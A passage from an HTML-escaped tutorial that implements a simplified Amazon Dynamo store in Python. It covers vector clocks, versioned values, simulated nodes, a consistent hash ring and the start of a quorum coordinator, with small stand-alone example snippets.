        &lt;span class="n"&gt;merged&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;other&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;k&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;k&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;all_keys&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;merged&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VectorClock(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
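&lt;p&gt;To make the merge rule concrete, here is a minimal stand-alone sketch (plain dicts instead of the &lt;code&gt;VectorClock&lt;/code&gt; class, so it runs on its own): the merged clock is the element-wise maximum over the union of node counters.&lt;br&gt;
&lt;/p&gt;

```python
def merge(a: dict, b: dict) -> dict:
    # Element-wise max over the union of keys: the result has
    # "seen" everything both input clocks saw.
    return {k: max(a.get(k, 0), b.get(k, 0)) for k in set(a) | set(b)}

c1 = {"node_a": 2, "node_b": 1}   # version that went through node_a twice
c2 = {"node_a": 1, "node_c": 3}   # concurrent version that went through node_c
print(merge(c1, c2))              # {'node_a': 2, 'node_b': 1, 'node_c': 3} (key order may vary)
```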



&lt;h3&gt;
  
  
  Part 2: Versioned Value
&lt;/h3&gt;

&lt;p&gt;Every value stored in Dynamo is wrapped with its vector clock. This pairing is what allows the coordinator to compare versions during reads and detect conflicts.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nd"&gt;@dataclass&lt;/span&gt;
&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    A value paired with its causal history (vector clock).

    When a client reads, they get back a VersionedValue.
    When they write an update, they must include the context
    (the vector clock they read) so Dynamo knows what version
    they&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re building on top of.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;object&lt;/span&gt;
    &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VersionedValue(value=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;, clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
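&lt;p&gt;The comparison the coordinator performs on these paired clocks can also be sketched stand-alone. The &lt;code&gt;dominates&lt;/code&gt; helper below is illustrative (it is not one of the article's classes): one version is an obsolete ancestor if the other dominates it on every counter, and two versions are concurrent conflicts when neither dominates.&lt;br&gt;
&lt;/p&gt;

```python
def dominates(a: dict, b: dict) -> bool:
    # a dominates b when a has seen at least as many events as b on every node.
    return all(a.get(k, 0) >= v for k, v in b.items())

ancestor   = {"node_a": 1}
descendant = {"node_a": 2}
sibling    = {"node_b": 1}

print(dominates(descendant, ancestor))   # True: plain update, the ancestor can be dropped
print(dominates(descendant, sibling))    # False
print(dominates(sibling, descendant))    # False: concurrent, both versions must be returned
```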



&lt;h3&gt;
  
  
  Part 3: Simulated Node
&lt;/h3&gt;

&lt;p&gt;In real Dynamo each node is a separate process. Here we simulate them as in-memory objects. The key detail: each node has its own local &lt;code&gt;storage&lt;/code&gt; dict. Nodes can be marked as &lt;code&gt;down&lt;/code&gt; to simulate failures.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Simulates a single Dynamo storage node.

    In production this would be a separate server with disk storage.
    Here it&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s an in-memory dict so we can demo the logic without networking.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node_id&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;token&lt;/span&gt;          &lt;span class="c1"&gt;# Position on the consistent hash ring
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;dict&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{}&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;           &lt;span class="c1"&gt;# Toggle to simulate node failures
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versioned_value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Store a versioned value. Returns False if the node is down.

        We store a LIST of versions per key, because a node might
        hold multiple concurrent (conflicting) versions until they
        are resolved by the application.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
        &lt;span class="c1"&gt;# In a real node this would be written to disk (e.g. BerkeleyDB)
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;versioned_value&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Return all versions of a key. Returns None if the node is down.
        A healthy node with no data for the key returns an empty list.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;storage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[])&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__repr__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;DOWN&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;down&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;token=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;DynamoNode(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;, &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
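&lt;p&gt;A quick sanity check of the failure contract, using a stripped-down stand-in for &lt;code&gt;DynamoNode&lt;/code&gt; (no vector clocks, just the &lt;code&gt;down&lt;/code&gt; flag and the ACK semantics the coordinator relies on):&lt;br&gt;
&lt;/p&gt;

```python
class MiniNode:
    # Stand-in for DynamoNode: only the local storage dict and the down flag.
    def __init__(self):
        self.storage = {}
        self.down = False

    def write(self, key, value):
        if self.down:
            return False          # unreachable node: the coordinator gets no ACK
        self.storage[key] = value
        return True

node = MiniNode()
assert node.write("cart", ["item-1"]) is True
node.down = True                               # simulate a crash
assert node.write("cart", ["item-2"]) is False
assert node.storage["cart"] == ["item-1"]      # the failed write left old data intact
```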



&lt;h3&gt;
  
  
  Part 4: Consistent Hash Ring
&lt;/h3&gt;

&lt;p&gt;The ring maps keys to nodes. We sort nodes by their token (ring position) and walk clockwise from the key's hash to find the coordinator and the preference list for any key.&lt;br&gt;

&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;


&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;ConsistentHashRing&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Maps any key to an ordered list of N nodes (the preference list).

    Nodes are placed at fixed positions (tokens) on a conceptual ring
    from 0 to 2^32. A key hashes to a position, then walks clockwise
    to find its nodes.

    This means adding/removing one node only remaps roughly
    1/(number of nodes) of the keys, rather than reshuffling almost
    everything the way modulo hashing would.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;]):&lt;/span&gt;
        &lt;span class="c1"&gt;# Sort nodes by token so we can do clockwise lookup efficiently
&lt;/span&gt;        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;sorted&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Consistent hash of a key into the ring&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s token space.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="c1"&gt;# Use MD5 for a simple, evenly distributed hash.
&lt;/span&gt;        &lt;span class="c1"&gt;# The Dynamo paper likewise applies MD5 to keys to place them on the ring.
&lt;/span&gt;        &lt;span class="n"&gt;digest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;hashlib&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;md5&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;()).&lt;/span&gt;&lt;span class="nf"&gt;hexdigest&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Return the first N nodes clockwise from key&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s hash position.

        These are the nodes responsible for storing this key.
        The first node in the list is the coordinator — it receives
        the client request and fans out to the others.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

        &lt;span class="n"&gt;key_hash&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;_hash&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Find the first node whose token is &amp;gt;= key's hash (clockwise)
&lt;/span&gt;        &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;enumerate&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;token&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;=&lt;/span&gt; &lt;span class="n"&gt;key_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;
            &lt;span class="c1"&gt;# If key_hash is greater than all tokens, wrap around to node 0
&lt;/span&gt;            &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

        &lt;span class="c1"&gt;# Walk clockwise, collecting N unique nodes
&lt;/span&gt;        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
            &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
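&lt;p&gt;The docstring's rebalancing claim is easy to check empirically. The sketch below is stand-alone (it reimplements the clockwise lookup for bare token lists) and counts how many of 1,000 keys change owner when a fourth node joins a three-node ring: only the arc of the ring claimed by the new token moves.&lt;br&gt;
&lt;/p&gt;

```python
import hashlib

def ring_owner(key: str, tokens: list) -> int:
    """Token of the first node clockwise from the key's hash position."""
    h = int(hashlib.md5(key.encode()).hexdigest(), 16) % (2**32)
    for t in sorted(tokens):
        if t >= h:
            return t
    return min(tokens)            # wrap around past the top of the ring

keys  = [f"key-{i}" for i in range(1000)]
three = [2**30, 2**31, 3 * 2**30]
four  = three + [2**32 - 1]       # one new node near the top of the ring
moved = sum(ring_owner(k, three) != ring_owner(k, four) for k in keys)
print(f"{moved}/1000 keys changed owner")   # roughly a quarter, not all of them
```

With modulo hashing (`hash % num_nodes`), going from 3 to 4 nodes would reassign about three quarters of the keys instead.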



&lt;h3&gt;
  
  
  Part 5: The Dynamo Coordinator
&lt;/h3&gt;

&lt;p&gt;This is the heart of the system — the logic that handles client requests, fans out to replicas, waits for quorum, and detects conflicts. Study this carefully; it's where all the earlier concepts converge.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SimplifiedDynamo&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Coordinates reads and writes across a cluster of DynamoNodes.

    Any node can act as coordinator for any request — there&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s no
    dedicated master. The coordinator is simply whichever node
    receives the client request (or the first node in the preference
    list, if using partition-aware routing).

    Configuration:
      N = total replicas per key
      R = minimum nodes that must respond to a read (read quorum)
      W = minimum nodes that must acknowledge a write (write quorum)
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

